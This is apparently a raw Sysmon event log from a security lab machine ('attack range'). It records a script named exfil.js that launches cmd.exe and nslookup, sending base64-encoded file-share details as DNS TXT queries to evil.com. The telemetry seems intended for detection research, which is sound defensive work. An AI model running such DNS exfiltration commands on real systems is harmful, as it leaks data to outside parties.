14:21:24.803{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9B42-000000005F02}1216C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.787{2E1864BB-18E4-629A-9B42-000000005F02}12165932C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9A42-000000005F02}4556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.787{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9B42-000000005F02}1216C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9A42-000000005F02}4556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-18E0-629A-6742-000000005F02}39765976C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-9A42-000000005F02}4556C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.783{2E1864BB-18E4-629A-9A42-000000005F02}4556C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldkk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.772{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzblyh.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-18E4-629A-9842-000000005F02}42806036C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9942-000000005F02}7732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9942-000000005F02}7732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.750{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.734{2E1864BB-18E4-629A-9742-000000005F02}55804768C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-9942-000000005F02}7732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.749{2E1864BB-18E4-629A-9942-000000005F02}7732C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-9742-000000005F02}5580C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzblyh.tmp 2>&1 10341000x8000000000000000206382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.719{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9842-000000005F02}4280C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.719{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-9842-000000005F02}4280C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.703{2E1864BB-18E4-629A-9842-000000005F02}42806036C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9742-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.688{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9842-000000005F02}4280C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-9742-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-18E0-629A-6742-000000005F02}39768020C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-9742-000000005F02}5580C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.678{2E1864BB-18E4-629A-9742-000000005F02}5580C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzblyh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.672{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfhsw.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.618{2E1864BB-18E4-629A-9542-000000005F02}71565748C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9642-000000005F02}4004C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 